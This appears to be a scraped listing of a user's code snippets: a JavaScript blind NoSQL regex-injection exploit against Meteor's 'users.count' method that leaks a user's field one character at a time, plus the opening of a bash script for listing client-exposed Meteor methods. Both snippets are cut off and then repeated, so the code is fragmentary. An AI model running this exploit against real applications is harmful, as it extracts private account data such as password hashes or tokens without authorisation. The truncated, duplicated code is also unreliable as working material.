Kert Ojasoo ojasookert

## meteor-regex-blind-nosql.js
(function exploit(user, field, alphabet, data = '', index = 0) {
  Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
    console.log('^' + data + alphabet[index] + '.*', res);
    if (res == 0) {
      index++;
    } else {
      data += alphabet[index];
      index = 0;
    }
    if (index >= alphabet.length) {

## meteor-methods.sh
#!/bin/bash

# A crude script to extract Meteor methods exposed to the client.
#
# Be sure to have npm and js-beautify installed.
#   - $ npm install -g js-beautify
#
# Tested on:
#   - GNU bash, version 4.4.19(1)-release (x86_64-pc-linux-gnu)
#   - Meteor 1.8.1
	(function exploit(user, field, alphabet, data = '', index = 0) {
	Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
	console.log('^' + data + alphabet[index] + '.*', res);
	if (res == 0) {
	index++;
	} else {
	data += alphabet[index];
	index = 0;
	}
	if (index >= alphabet.length) {
	#!/bin/bash

	# A crude script to extract Meteor methods exposed to the client.
	#
	# Be sure to have npm and js-beautify installed.
	# - $ npm install -g js-beautify
	#
	# Tested on:
	# - GNU bash, version 4.4.19(1)-release (x86_64-pc-linux-gnu)
	# - Meteor 1.8.1